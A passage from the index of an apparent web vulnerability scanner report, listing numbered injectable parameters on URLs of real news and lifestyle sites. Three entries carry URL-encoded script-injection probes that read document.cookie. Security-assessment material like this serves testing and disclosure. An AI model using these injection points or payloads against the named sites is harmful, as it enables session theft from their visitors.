1.338. http://www.dailyfinance.com/category/technology/ [name of an arbitrarily supplied request parameter]

1.339. http://www.dailyfinance.com/category/video/ [REST URL parameter 2]

1.340. http://www.dailyfinance.com/category/video/ [REST URL parameter 2]

1.341. http://www.dailyfinance.com/category/video/ [name of an arbitrarily supplied request parameter]

1.342. http://www.dailyfinance.com/help/ [name of an arbitrarily supplied request parameter]

1.343. http://www.dailyfinance.com/historical-stock-prices/ [name of an arbitrarily supplied request parameter]

1.344. http://www.dailyfinance.com/market-news/ [name of an arbitrarily supplied request parameter]

1.345. http://www.dailyfinance.com/market-news/bonds/ [name of an arbitrarily supplied request parameter]

1.346. http://www.dailyfinance.com/market-news/currencies/ [name of an arbitrarily supplied request parameter]

1.347. http://www.dailyfinance.com/market-news/futures/ [name of an arbitrarily supplied request parameter]

1.348. http://www.dailyfinance.com/market-news/futures/commodities/ [name of an arbitrarily supplied request parameter]

1.349. http://www.dailyfinance.com/market-news/international/ [name of an arbitrarily supplied request parameter]

1.350. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

1.351. http://www.dailyfinance.com/press-releases/ [name of an arbitrarily supplied request parameter]

1.352. http://www.dailyfinance.com/quotes/bank-of-america-corporation/bac/nys [REST URL parameter 3]

1.353. http://www.dailyfinance.com/quotes/bank-of-america-corporation/bac/nys [REST URL parameter 3]

1.354. http://www.dailyfinance.com/quotes/citigroup-incorporated/c/nys [REST URL parameter 3]

1.355. http://www.dailyfinance.com/quotes/citigroup-incorporated/c/nys [REST URL parameter 3]

1.356. http://www.dailyfinance.com/quotes/complete-production-services-inc/cpx/nys [REST URL parameter 3]

1.357. http://www.dailyfinance.com/quotes/complete-production-services-inc/cpx/nys [REST URL parameter 3]

1.358. http://www.dailyfinance.com/quotes/daqq-new-energy-corp-american-depositary-shares-each-representing-five-ordinary-shares/dq/nys [REST URL parameter 3]

1.359. http://www.dailyfinance.com/quotes/daqq-new-energy-corp-american-depositary-shares-each-representing-five-ordinary-shares/dq/nys [REST URL parameter 3]

1.360. http://www.dailyfinance.com/quotes/dax-performance-index/dax/dei [REST URL parameter 3]

1.361. http://www.dailyfinance.com/quotes/dax-performance-index/dax/dei [REST URL parameter 3]

1.362. http://www.dailyfinance.com/quotes/dow-jones-industrial-average/$indu/dji [REST URL parameter 3]

1.363. http://www.dailyfinance.com/quotes/dow-jones-industrial-average/$indu/dji [REST URL parameter 3]

1.364. http://www.dailyfinance.com/quotes/euro-b-vs-united-states-dollar-spot-eur-usd/eurusd/fx1 [REST URL parameter 3]

1.365. http://www.dailyfinance.com/quotes/euro-b-vs-united-states-dollar-spot-eur-usd/eurusd/fx1 [REST URL parameter 3]

1.366. http://www.dailyfinance.com/quotes/evergreen-energy-inc-new/eee/nys [REST URL parameter 3]

1.367. http://www.dailyfinance.com/quotes/evergreen-energy-inc-new/eee/nys [REST URL parameter 3]

1.368. http://www.dailyfinance.com/quotes/ftse-100/ukx/ise [REST URL parameter 3]

1.369. http://www.dailyfinance.com/quotes/ftse-100/ukx/ise [REST URL parameter 3]

1.370. http://www.dailyfinance.com/quotes/gmx-resources-inc/gmxr/nys [REST URL parameter 3]

1.371. http://www.dailyfinance.com/quotes/gmx-resources-inc/gmxr/nys [REST URL parameter 3]

1.372. http://www.dailyfinance.com/quotes/gold-futures-apr-2011-composite/%2fgc\j11/cmx [REST URL parameter 3]

1.373. http://www.dailyfinance.com/quotes/gold-futures-apr-2011-composite/%2fgc\j11/cmx [REST URL parameter 3]

1.374. http://www.dailyfinance.com/quotes/hang-seng-index/hsix/fx1 [REST URL parameter 3]

1.375. http://www.dailyfinance.com/quotes/hang-seng-index/hsix/fx1 [REST URL parameter 3]

1.376. http://www.dailyfinance.com/quotes/henry-hub-natural-gas-futures-apr-2011-composite/%2fng\j11/nym [REST URL parameter 3]

1.377. http://www.dailyfinance.com/quotes/henry-hub-natural-gas-futures-apr-2011-composite/%2fng\j11/nym [REST URL parameter 3]

1.378. http://www.dailyfinance.com/quotes/k-v-pharmaceutical-company/kv.a/nys [REST URL parameter 3]

1.379. http://www.dailyfinance.com/quotes/k-v-pharmaceutical-company/kv.a/nys [REST URL parameter 3]

1.380. http://www.dailyfinance.com/quotes/kv-pharmaceutical-co-cl-b/kv.b/nys [REST URL parameter 3]

1.381. http://www.dailyfinance.com/quotes/kv-pharmaceutical-co-cl-b/kv.b/nys [REST URL parameter 3]

1.382. http://www.dailyfinance.com/quotes/las-vegas-sands-corp/lvs/nys [REST URL parameter 3]

1.383. http://www.dailyfinance.com/quotes/las-vegas-sands-corp/lvs/nys [REST URL parameter 3]

1.384. http://www.dailyfinance.com/quotes/light-sweet-crude-oil-futures-mar-2011-composite/%2fcl\h11/nym [REST URL parameter 3]

1.385. http://www.dailyfinance.com/quotes/light-sweet-crude-oil-futures-mar-2011-composite/%2fcl\h11/nym [REST URL parameter 3]

1.386. http://www.dailyfinance.com/quotes/nasdaq-composite/$compx/nai [REST URL parameter 3]

1.387. http://www.dailyfinance.com/quotes/nasdaq-composite/$compx/nai [REST URL parameter 3]

1.388. http://www.dailyfinance.com/quotes/neophotoniocs-corporation/nptn/nys [REST URL parameter 3]

1.389. http://www.dailyfinance.com/quotes/neophotoniocs-corporation/nptn/nys [REST URL parameter 3]

1.390. http://www.dailyfinance.com/quotes/nikkei-225/n225/fx1 [REST URL parameter 3]

1.391. http://www.dailyfinance.com/quotes/nikkei-225/n225/fx1 [REST URL parameter 3]

1.392. http://www.dailyfinance.com/quotes/platinum-futures-apr-2011-composite/%2fpl\j11/nym [REST URL parameter 3]

1.393. http://www.dailyfinance.com/quotes/platinum-futures-apr-2011-composite/%2fpl\j11/nym [REST URL parameter 3]

1.394. http://www.dailyfinance.com/quotes/sandp-500-index-rth/$inx/cmi [REST URL parameter 3]

1.395. http://www.dailyfinance.com/quotes/sandp-500-index-rth/$inx/cmi [REST URL parameter 3]

1.396. http://www.dailyfinance.com/quotes/spdr-sandp-500-etf-tr/spy/nys [REST URL parameter 3]

1.397. http://www.dailyfinance.com/quotes/spdr-sandp-500-etf-tr/spy/nys [REST URL parameter 3]

1.398. http://www.dailyfinance.com/quotes/sprint-nextel-corporation/s/nys [REST URL parameter 3]

1.399. http://www.dailyfinance.com/quotes/sprint-nextel-corporation/s/nys [REST URL parameter 3]

1.400. http://www.dailyfinance.com/quotes/ten-year-u-s-treasury-note/(tc10y/bss [REST URL parameter 3]

1.401. http://www.dailyfinance.com/quotes/ten-year-u-s-treasury-note/(tc10y/bss [REST URL parameter 3]

1.402. http://www.dailyfinance.com/quotes/uk-sterling-b-vs-united-states-dollar-spot-gbp-usd/gbpusd/fx1 [REST URL parameter 3]

1.403. http://www.dailyfinance.com/quotes/uk-sterling-b-vs-united-states-dollar-spot-gbp-usd/gbpusd/fx1 [REST URL parameter 3]

1.404. http://www.dailyfinance.com/quotes/united-states-dollar-b-vs-japanese-yen-spot-usd-jpy/usdjpy/fx1 [REST URL parameter 3]

1.405. http://www.dailyfinance.com/quotes/united-states-dollar-b-vs-japanese-yen-spot-usd-jpy/usdjpy/fx1 [REST URL parameter 3]

1.406. http://www.dailyfinance.com/quotes/united-states-dollar-b-vs-swiss-franc-spot-usd-chf/usdchf/fx1 [REST URL parameter 3]

1.407. http://www.dailyfinance.com/quotes/united-states-dollar-b-vs-swiss-franc-spot-usd-chf/usdchf/fx1 [REST URL parameter 3]

1.408. http://www.dailyfinance.com/search/ [name of an arbitrarily supplied request parameter]

1.409. http://www.dailyfinance.com/spotlight/ [name of an arbitrarily supplied request parameter]

1.410. http://www.dailyfinance.com/stock-charts/ [name of an arbitrarily supplied request parameter]

1.411. http://www.dailyfinance.com/stock-quotes/ [name of an arbitrarily supplied request parameter]

1.412. http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/ [name of an arbitrarily supplied request parameter]

1.413. http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/ [name of an arbitrarily supplied request parameter]

1.414. http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/ [name of an arbitrarily supplied request parameter]

1.415. http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/ [name of an arbitrarily supplied request parameter]

1.416. http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/ [name of an arbitrarily supplied request parameter]

1.417. http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/ [name of an arbitrarily supplied request parameter]

1.418. http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/ [name of an arbitrarily supplied request parameter]

1.419. http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/ [name of an arbitrarily supplied request parameter]

1.420. http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/ [name of an arbitrarily supplied request parameter]

1.421. http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/ [name of an arbitrarily supplied request parameter]

1.422. http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/ [name of an arbitrarily supplied request parameter]

1.423. http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/ [name of an arbitrarily supplied request parameter]

1.424. http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/ [name of an arbitrarily supplied request parameter]

1.425. http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/ [name of an arbitrarily supplied request parameter]

1.426. http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/ [name of an arbitrarily supplied request parameter]

1.427. http://www.dailyfinance.com/story/insurance/whistleblowers-recover-taxpayer-money-from-drug-company-overchar/19827851/ [name of an arbitrarily supplied request parameter]

1.428. http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/ [name of an arbitrarily supplied request parameter]

1.429. http://www.dailyfinance.com/story/investing-basics/financial-adviser-reasons-to-dump-find-new/19824970/ [name of an arbitrarily supplied request parameter]

1.430. http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/ [name of an arbitrarily supplied request parameter]

1.431. http://www.dailyfinance.com/story/investing-basics/investing-rules-tips-children-kids/19829360/ [name of an arbitrarily supplied request parameter]

1.432. http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/ [name of an arbitrarily supplied request parameter]

1.433. http://www.dailyfinance.com/story/investing-basics/treasury-tips-a-looming-disaster-for-small-investors/19827608/ [name of an arbitrarily supplied request parameter]

1.434. http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/ [name of an arbitrarily supplied request parameter]

1.435. http://www.dailyfinance.com/story/investing/amazon-trades-short-term-turmoil-for-long-term-promise/19826704/ [name of an arbitrarily supplied request parameter]

1.436. http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/ [name of an arbitrarily supplied request parameter]

1.437. http://www.dailyfinance.com/story/investing/health-insurers-post-healthy-quarterly-profits-cautious-2011-outlook/19812544/ [name of an arbitrarily supplied request parameter]

1.438. http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/ [name of an arbitrarily supplied request parameter]

1.439. http://www.dailyfinance.com/story/investing/japan-could-be-the-best-of-both-worlds-for-investors/19829520/ [name of an arbitrarily supplied request parameter]

1.440. http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/ [name of an arbitrarily supplied request parameter]

1.441. http://www.dailyfinance.com/story/investing/nikkei-surges-on-steel-merger-plans-and-impressive-earnings/19828546/ [name of an arbitrarily supplied request parameter]

1.442. http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/ [name of an arbitrarily supplied request parameter]

1.443. http://www.dailyfinance.com/story/investing/week-in-preview-coca-cola-disney-and-hasbro-earnings/19829475/ [name of an arbitrarily supplied request parameter]

1.444. http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/ [name of an arbitrarily supplied request parameter]

1.445. http://www.dailyfinance.com/story/investing/why-global-food-price-inflation-really-matters/19827378/ [name of an arbitrarily supplied request parameter]

1.446. http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/ [name of an arbitrarily supplied request parameter]

1.447. http://www.dailyfinance.com/story/media/chaos-in-todays-egypt-sparks-worries-about-its-ancient-past/19828072/ [name of an arbitrarily supplied request parameter]

1.448. http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/ [name of an arbitrarily supplied request parameter]

1.449. http://www.dailyfinance.com/story/media/hulu-gets-stewart-and-colbert-shows-back/19828061/ [name of an arbitrarily supplied request parameter]

1.450. http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/ [name of an arbitrarily supplied request parameter]

1.451. http://www.dailyfinance.com/story/media/is-piers-morgan-cnns-savior-so-far-at-least-the-answer-is-no/19826242/ [name of an arbitrarily supplied request parameter]

1.452. http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/ [name of an arbitrarily supplied request parameter]

1.453. http://www.dailyfinance.com/story/media/sesame-street-coming-to-new-childrens-museum/19828110/ [name of an arbitrarily supplied request parameter]

1.454. http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/ [name of an arbitrarily supplied request parameter]

1.455. http://www.dailyfinance.com/story/microsoft-denies-copying-google-can-it-compete-in-obscure-searc/19825760/ [name of an arbitrarily supplied request parameter]

1.456. http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/ [name of an arbitrarily supplied request parameter]

1.457. http://www.dailyfinance.com/story/nyse/stocks-finish-week-with-more-gains-after-jobs-data/19828933/ [name of an arbitrarily supplied request parameter]

1.458. http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/ [name of an arbitrarily supplied request parameter]

1.459. http://www.dailyfinance.com/story/raj-patel-value-of-nothing-interview-buddhist-economics/19827037/ [name of an arbitrarily supplied request parameter]

1.460. http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/ [name of an arbitrarily supplied request parameter]

1.461. http://www.dailyfinance.com/story/real-estate/foreclosure-hawaii-supreme-court-nonjudicial-fraud-constitution/19828831/ [name of an arbitrarily supplied request parameter]

1.462. http://www.dailyfinance.com/story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/ [name of an arbitrarily supplied request parameter]

1.463. http://www.dailyfinance.com/story/son-of-former-enron-ceo-jeffrey-skilling-found-dead-in-apartment/19828738/ [name of an arbitrarily supplied request parameter]

1.464. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [icid parameter]

1.465. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [icid parameter]

1.466. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [name of an arbitrarily supplied request parameter]

1.467. http://www.dailyfinance.com/story/stock-picks/face-off-on-stocks-disney-viacom-time-warner-video/19823676/ [name of an arbitrarily supplied request parameter]

1.468. http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/ [name of an arbitrarily supplied request parameter]

1.469. http://www.dailyfinance.com/story/stock-picks/inside-wall-street-where-to-bet-on-the-resurgence-in-energy-sto/19824458/ [name of an arbitrarily supplied request parameter]

1.470. http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/ [name of an arbitrarily supplied request parameter]

1.471. http://www.dailyfinance.com/story/streetwise/buzzword-of-the-week-accentuate-the-negative/19824425/ [name of an arbitrarily supplied request parameter]

1.472. http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/ [name of an arbitrarily supplied request parameter]

1.473. http://www.dailyfinance.com/story/streetwise/steelers-packers-super-bowl-stock-market-indicator-bull-forecast/19829042/ [name of an arbitrarily supplied request parameter]

1.474. http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/ [name of an arbitrarily supplied request parameter]

1.475. http://www.dailyfinance.com/story/verizon-halts-iphone-4-pre-orders-tips-for-snagging-phone-next/19828811/ [name of an arbitrarily supplied request parameter]

1.476. http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/ [name of an arbitrarily supplied request parameter]

1.477. http://www.dailyfinance.com/story/wall-street-pay-versus-most-americans/19825075/ [name of an arbitrarily supplied request parameter]

1.478. http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/ [name of an arbitrarily supplied request parameter]

1.479. http://www.dailyfinance.com/story/will-you-be-my-financially-responsible-valentine/19829277/ [name of an arbitrarily supplied request parameter]

1.480. http://www.dailyfinance.com/tag/madoff/ [REST URL parameter 2]

1.481. http://www.dailyfinance.com/tag/madoff/ [REST URL parameter 2]

1.482. http://www.dailyfinance.com/tag/madoff/ [name of an arbitrarily supplied request parameter]

1.483. http://www.dailyfinance.com/to-go/ [name of an arbitrarily supplied request parameter]

1.484. http://www.dailyfinance.com/wire/ [name of an arbitrarily supplied request parameter]

1.485. http://www.dailyfinance.com/wire/ap/ [name of an arbitrarily supplied request parameter]

1.486. http://www.dailyfinance.com/wire/page/2/ [name of an arbitrarily supplied request parameter]

1.487. http://www.dailyfinance.com/writers/abigail-field/ [REST URL parameter 2]

1.488. http://www.dailyfinance.com/writers/abigail-field/ [REST URL parameter 2]

1.489. http://www.dailyfinance.com/writers/abigail-field/ [name of an arbitrarily supplied request parameter]

1.490. http://www.dailyfinance.com/writers/annabelle-gurwitch/ [REST URL parameter 2]

1.491. http://www.dailyfinance.com/writers/annabelle-gurwitch/ [REST URL parameter 2]

1.492. http://www.dailyfinance.com/writers/annabelle-gurwitch/ [name of an arbitrarily supplied request parameter]

1.493. http://www.dailyfinance.com/writers/bruce-watson/ [REST URL parameter 2]

1.494. http://www.dailyfinance.com/writers/bruce-watson/ [REST URL parameter 2]

1.495. http://www.dailyfinance.com/writers/bruce-watson/ [name of an arbitrarily supplied request parameter]

1.496. http://www.dailyfinance.com/writers/dawn-kawamoto/ [REST URL parameter 2]

1.497. http://www.dailyfinance.com/writers/dawn-kawamoto/ [REST URL parameter 2]

1.498. http://www.dailyfinance.com/writers/dawn-kawamoto/ [name of an arbitrarily supplied request parameter]

1.499. http://www.dailyfinance.com/writers/gene-marcial/ [REST URL parameter 2]

1.500. http://www.dailyfinance.com/writers/gene-marcial/ [REST URL parameter 2]

1.501. http://www.dailyfinance.com/writers/gene-marcial/ [name of an arbitrarily supplied request parameter]

1.502. http://www.dailyfinance.com/writers/jean-chatzky/ [REST URL parameter 2]

1.503. http://www.dailyfinance.com/writers/jean-chatzky/ [REST URL parameter 2]

1.504. http://www.dailyfinance.com/writers/jean-chatzky/ [name of an arbitrarily supplied request parameter]

1.505. http://www.dailyfinance.com/writers/jonathan-berr/ [REST URL parameter 2]

1.506. http://www.dailyfinance.com/writers/jonathan-berr/ [REST URL parameter 2]

1.507. http://www.dailyfinance.com/writers/jonathan-berr/ [name of an arbitrarily supplied request parameter]

1.508. http://www.dailyfinance.com/writers/joseph-lazzaro/ [REST URL parameter 2]

1.509. http://www.dailyfinance.com/writers/joseph-lazzaro/ [REST URL parameter 2]

1.510. http://www.dailyfinance.com/writers/joseph-lazzaro/ [name of an arbitrarily supplied request parameter]

1.511. http://www.dailyfinance.com/writers/matthew-pulomena/ [REST URL parameter 2]

1.512. http://www.dailyfinance.com/writers/matthew-pulomena/ [REST URL parameter 2]

1.513. http://www.dailyfinance.com/writers/matthew-pulomena/ [name of an arbitrarily supplied request parameter]

1.514. http://www.dailyfinance.com/writers/matthew-scott/ [REST URL parameter 2]

1.515. http://www.dailyfinance.com/writers/matthew-scott/ [REST URL parameter 2]

1.516. http://www.dailyfinance.com/writers/matthew-scott/ [name of an arbitrarily supplied request parameter]

1.517. http://www.dailyfinance.com/writers/mercedes-cardona/ [REST URL parameter 2]

1.518. http://www.dailyfinance.com/writers/mercedes-cardona/ [REST URL parameter 2]

1.519. http://www.dailyfinance.com/writers/mercedes-cardona/ [name of an arbitrarily supplied request parameter]

1.520. http://www.dailyfinance.com/writers/peter-cohan/ [REST URL parameter 2]

1.521. http://www.dailyfinance.com/writers/peter-cohan/ [REST URL parameter 2]

1.522. http://www.dailyfinance.com/writers/peter-cohan/ [name of an arbitrarily supplied request parameter]

1.523. http://www.dailyfinance.com/writers/trey-thoelcke/ [REST URL parameter 2]

1.524. http://www.dailyfinance.com/writers/trey-thoelcke/ [REST URL parameter 2]

1.525. http://www.dailyfinance.com/writers/trey-thoelcke/ [name of an arbitrarily supplied request parameter]

1.526. http://www.dailyfinance.com/writers/vishesh-kumar/ [REST URL parameter 2]

1.527. http://www.dailyfinance.com/writers/vishesh-kumar/ [REST URL parameter 2]

1.528. http://www.dailyfinance.com/writers/vishesh-kumar/ [name of an arbitrarily supplied request parameter]

1.529. http://www.diylife.com/ [name of an arbitrarily supplied request parameter]

1.530. http://www.diylife.com/category/eric-stromer/ [REST URL parameter 2]

1.531. http://www.diylife.com/category/eric-stromer/ [REST URL parameter 2]

1.532. http://www.diylife.com/category/eric-stromer/ [name of an arbitrarily supplied request parameter]

1.533. http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter]

1.534. http://www.engadget.com/tag/7+mozart [REST URL parameter 2]

1.535. http://www.engadget.com/tag/7+mozart [REST URL parameter 2]

1.536. http://www.engadget.com/tag/FaceTime/ [REST URL parameter 2]

1.537. http://www.engadget.com/tag/FaceTime/ [REST URL parameter 2]

1.538. http://www.engadget.com/tag/Fring/ [REST URL parameter 2]

1.539. http://www.engadget.com/tag/Fring/ [REST URL parameter 2]

1.540. http://www.engadget.com/tag/GoogleTV/ [REST URL parameter 2]

1.541. http://www.engadget.com/tag/GoogleTV/ [REST URL parameter 2]

1.542. http://www.engadget.com/tag/ScreenGrabs/ [REST URL parameter 2]

1.543. http://www.engadget.com/tag/ScreenGrabs/ [REST URL parameter 2]

1.544. http://www.engadget.com/tag/Sonos/ [REST URL parameter 2]

1.545. http://www.engadget.com/tag/Sonos/ [REST URL parameter 2]

1.546. http://www.engadget.com/tag/askengadget [REST URL parameter 2]

1.547. http://www.engadget.com/tag/askengadget [REST URL parameter 2]

1.548. http://www.engadget.com/tag/htc [REST URL parameter 2]

1.549. http://www.engadget.com/tag/htc [REST URL parameter 2]

1.550. http://www.engadget.com/tag/htc,legend [REST URL parameter 2]

1.551. http://www.engadget.com/tag/htc,legend [REST URL parameter 2]

1.552. http://www.engadget.com/tag/mta [REST URL parameter 2]

1.553. http://www.engadget.com/tag/mta [REST URL parameter 2]

1.554. http://www.engadget.com/tag/mwc [REST URL parameter 2]

1.555. http://www.engadget.com/tag/mwc [REST URL parameter 2]

1.556. http://www.engadget.com/tag/qrcode [REST URL parameter 2]

1.557. http://www.engadget.com/tag/qrcode [REST URL parameter 2]

1.558. http://www.engadget.com/tag/shocker [REST URL parameter 2]

1.559. http://www.engadget.com/tag/shocker [REST URL parameter 2]

1.560. http://www.engadget.com/tag/xxxe42f9%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e9716d68035d [REST URL parameter 2]

1.561. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.562. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.563. http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/ [name of an arbitrarily supplied request parameter]

1.564. http://www.fanhouse.com/2011/02/03/cal-supporters-rally-to-save-disbanded-sports-programs/ [name of an arbitrarily supplied request parameter]

1.565. http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/ [name of an arbitrarily supplied request parameter]

1.566. http://www.fanhouse.com/2011/02/04/b-j-giannone-high-school-swimmer-remembered-fondly-in-pool-of/ [name of an arbitrarily supplied request parameter]

1.567. http://www.fanhouse.com/2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/ [name of an arbitrarily supplied request parameter]

1.568. http://www.fanhouse.com/2011/02/06/new-freeskier-star-alex-schlopy-in-shock-after-big-victory/ [name of an arbitrarily supplied request parameter]

1.569. http://www.gadling.com/ [d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2 parameter]

1.570. http://www.gadling.com/ [name of an arbitrarily supplied request parameter]

1.571. http://www.gadling.com/2010/11/09/setai-fifth-avenue-opens-in-midtown-manhattan/ [name of an arbitrarily supplied request parameter]

1.572. http://www.kayak.com/clickthrough.jsp [plid parameter]

1.573. http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter]

1.574. http://www.kitchendaily.com/recipes/ [name of an arbitrarily supplied request parameter]

1.575. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]

1.576. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]

1.577. http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/ [name of an arbitrarily supplied request parameter]

1.578. http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/ [name of an arbitrarily supplied request parameter]

1.579. http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/ [name of an arbitrarily supplied request parameter]

1.580. http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/ [name of an arbitrarily supplied request parameter]

1.581. http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/ [name of an arbitrarily supplied request parameter]

1.582. http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/ [name of an arbitrarily supplied request parameter]

1.583. http://www.luxist.com/tag/CelebrityRealEstate/ [REST URL parameter 2]

1.584. http://www.luxist.com/tag/CelebrityRealEstate/ [REST URL parameter 2]

1.585. http://www.luxist.com/tag/CelebrityRealEstate/ [REST URL parameter 2]

1.586. http://www.luxist.com/tag/CelebrityRealEstate/ [name of an arbitrarily supplied request parameter]

1.587. http://www.luxist.com/tag/CelebrityRealEstate/ [name of an arbitrarily supplied request parameter]

1.588. http://www.luxist.com/tag/condo+auction/ [REST URL parameter 2]

1.589. http://www.luxist.com/tag/condo+auction/ [REST URL parameter 2]

1.590. http://www.luxist.com/tag/condo+auction/ [REST URL parameter 2]

1.591. http://www.luxist.com/tag/condo+auction/ [name of an arbitrarily supplied request parameter]

1.592. http://www.luxist.com/tag/condo+auction/ [name of an arbitrarily supplied request parameter]

1.593. http://www.luxist.com/tag/hoteldeals/ [REST URL parameter 2]

1.594. http://www.luxist.com/tag/hoteldeals/ [REST URL parameter 2]

1.595. http://www.luxist.com/tag/hoteldeals/ [REST URL parameter 2]

1.596. http://www.luxist.com/tag/hoteldeals/ [name of an arbitrarily supplied request parameter]

1.597. http://www.luxist.com/tag/hoteldeals/ [name of an arbitrarily supplied request parameter]

1.598. http://www.macworld.com/article/157640/2011/02/iwow_3d.html [REST URL parameter 3]

1.599. http://www.macworld.com/article/157640/2011/02/iwow_3d.html [REST URL parameter 4]

1.600. http://www.macworld.com/article/157640/2011/02/iwow_3d.html [REST URL parameter 5]

1.601. http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter]

1.602. http://www.masstransitmag.com/online/article.jsp [id parameter]

1.603. http://www.masstransitmag.com/online/article.jsp [id parameter]

1.604. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]

1.605. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]

1.606. http://www.masstransitmag.com/online/article.jsp [siteSection parameter]

1.607. http://www.masstransitmag.com/online/article.jsp [siteSection parameter]

1.608. http://www.mydaily.com/ [9ae29%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb6018bd2558 parameter]

1.609. http://www.mydaily.com/ [name of an arbitrarily supplied request parameter]

1.610. http://www.mydaily.com/index.php [a parameter]

1.611. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

1.612. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

1.613. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

1.614. http://www.pageflakes.com/subscribe.aspx [url parameter]

1.615. http://www.parentdish.com/ [name of an arbitrarily supplied request parameter]

1.616. http://www.pawnation.com/ [name of an arbitrarily supplied request parameter]

1.617. http://www.physorg.com/news/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html [REST URL parameter 1]

1.618. http://www.physorg.com/news/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html [REST URL parameter 1]

1.619. http://www.physorg.com/news/2011-02-lab-on-a-chip-technology-accuracy-lab-results.html [REST URL parameter 1]

1.620. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]

1.621. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]

1.622. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

1.623. http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter]

1.624. http://www.shelterpop.com/category/famous-homes/ [REST URL parameter 2]

